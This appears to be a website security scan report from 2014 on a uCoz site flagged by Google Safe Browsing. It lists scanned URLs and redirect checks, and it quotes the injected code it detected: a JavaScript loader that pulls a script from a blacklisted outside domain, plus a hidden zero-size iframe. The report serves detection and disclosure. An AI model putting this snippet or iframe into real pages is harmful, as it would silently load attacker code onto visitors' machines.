Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=clanhs.ucoz.ru
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://clanhs.ucoz.ru/ | 200 OK Content-Length: 49485 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: oqme.about-home.info
(function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { script.src = 'http://oqme.about-home.info' + '/?538449=JWwlI3czPT4yOjg1ImxgYWRoY2c'; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window);
Decoded script:
function () { if (typeof w.document.body !== "undefined") { script.src = "http://oqme.about-home.info/?548044=uPG4vuquoKOvp6Wov_H9_Pn1_vs"; w.document.body.appendChild(script); clearInterval(i); } }
/*** called setInterval with function () { if (typeof w.document.body !== "undefined") { script.src = "http://oqme.about-home.info/?548044=uPG4vuquoKOvp6Wov_H9_Pn1_vs"; w.document.body.appendChild(script); clearInterval(i); } }, 200 */
Hidden iFrame found. size: 0x0 src: http://ga1.net.ru/
<iframe src="http://ga1.net.ru/" name="iframe" width="0%" height="0%" scrolling="no" frameborder=0>
http://nativevat.hol.es/rases.txt | HTTP/1.1 404 Not Found Connection: close Date: Wed, 30 Jul 2014 07:04:32 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://www.hostinger.lt/klaida_404? | 200 OK Content-Length: 10701 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js | 200 OK Content-Length: 91556 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.14/jquery-ui.min.js | 200 OK Content-Length: 201658 Content-Type: text/javascript | clean |
http://nativevat.hol.es/js/site.php | HTTP/1.1 404 Not Found Connection: close Date: Wed, 30 Jul 2014 07:04:33 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://www.hostinger.lt/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://pjatnuchanu.ucoz.ua/adblock.txt | 200 OK Content-Length: 3082 Content-Type: text/plain | clean |
http://s40.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s40.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22618 Content-Type: text/javascript | clean |
http://s40.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://mobmas.ru/s/948 | HTTP/1.1 302 Found Cache-Control: no-cache, must-relative Connection: close Date: Wed, 30 Jul 2014 07:04:36 GMT Location: http://iqmasa.ru/88ufzxjs4ri8s9byuoxhqsqjitkh9p1 Server: Apache Content-Length: 2114 Content-Type: text/html; charset=utf-8 Last-Modified: Wed, 30 Jul 2014 07:04:36 GMT X-Powered-By: PHP/5.2.17 | clean |
http://iqmasa.ru/88ufzxjs4ri8s9byuoxhqsqjitkh9p1 | 200 OK Content-Length: 7987 Content-Type: text/javascript | clean |
http://clck.ru/98oGG | HTTP/1.1 302 FOUND Connection: close Date: Wed, 30 Jul 2014 07:04:36 GMT Location: http://iqmasa.ru/963qlrfreov6bjcvlwlslw1af3d31nbp Server: nginx/1.4.4 Content-Length: 305 Content-Type: text/html; charset=utf-8 | clean |
http://iqmasa.ru/963qlrfreov6bjcvlwlslw1af3d31nbp | 200 OK Content-Length: 7939 Content-Type: text/javascript | clean |
http://writeln.ru/b/get.php?id=5568 | 404 Not Found Content-Length: 1479 Content-Type: text/html | clean |
http://writeln.ru/ | 200 OK Content-Length: 2274 Content-Type: text/html | clean |
http://writeln.ru/new/ | 200 OK Content-Length: 2274 Content-Type: text/html | clean |
http://writeln.ru/actions/ | 200 OK Content-Length: 2274 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: clanhs.ucoz.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 30 Jul 2014 07:04:30 GMT
Server: uServ/3.2.2
Content-Length: 49485
Content-Type: text/html; charset=UTF-8
...49485 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: clanhs.ucoz.ru
Referer: http://www.google.com/search?q=clanhs.ucoz.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.